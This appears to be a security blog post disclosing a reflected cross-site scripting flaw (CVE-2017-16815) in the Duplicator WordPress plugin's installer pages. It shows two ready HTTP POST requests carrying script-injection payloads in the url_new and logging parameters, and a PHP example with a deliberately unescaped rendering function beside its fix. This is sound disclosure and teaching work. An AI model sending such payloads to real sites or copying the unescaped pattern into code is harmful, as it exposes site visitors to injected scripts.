
Duplicator Migration (XSS) CVE-2017-16815

I keep finding cross-site scripting in WordPress plugins; I’m going to have to automate it somehow :).
In this case it is in a plugin called “Duplicator Migration”, version 1.2.28 (https://es.wordpress.org/plugins/duplicator/), which is active on more than 1 million WordPress sites and is developed by Snapcreek (https://snapcreek.com).
It can be exploited using two attack vectors:
From the view.step4.php file:

POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

url_new="><script>alert(1)</script>demo

From the view.step2.php file:

POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

logging="><script>alert(1)</script>demo

I’m sorry I didn’t show any capture of the XSS execution, but I didn’t need to do it because the Snapcreek developers didn’t ask me to.
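To show the class of bug behind both requests, here is an added PHP example (not Duplicator's own source, which this post does not quote): a POST value is reflected into an HTML attribute, first unescaped and then encoded for that context; the form field name and the render functions are assumptions modelled on the url_new request above.

```php
<?php
// Added illustration, not the plugin's code: how a reflected POST value
// breaks out of an HTML attribute, and how output encoding stops it.

// Constructed input with the same shape as the payload in the requests above.
$_POST['url_new'] = '"><script>alert(1)</script>demo';

// Vulnerable pattern (hypothetical): the raw value is concatenated into the
// value attribute. The leading " closes the attribute, > closes the tag, and
// the rest of the string is parsed as markup by the browser.
function render_unsafe(string $url): string {
    return '<input type="text" name="url_new" value="' . $url . '">';
}

// Hardened pattern: encode for the attribute context before output.
// ENT_QUOTES converts both " and ' to entities, so the value can never
// terminate the attribute. In WordPress code the equivalent helper is
// esc_attr(); htmlspecialchars() is used here so the snippet runs alone.
function render_safe(string $url): string {
    $escaped = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="url_new" value="' . $escaped . '">';
}

$url = $_POST['url_new'] ?? '';
echo render_unsafe($url), PHP_EOL;  // attribute broken, script tag becomes live markup
echo render_safe($url), PHP_EOL;    // same payload rendered as inert text inside the attribute
```

The same fix applies to the logging parameter on view.step2.php: any value reflected into the installer's HTML must be encoded for the context it lands in (attribute, element body, or JavaScript), since the installer pages are reachable without authentication.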

adm1n
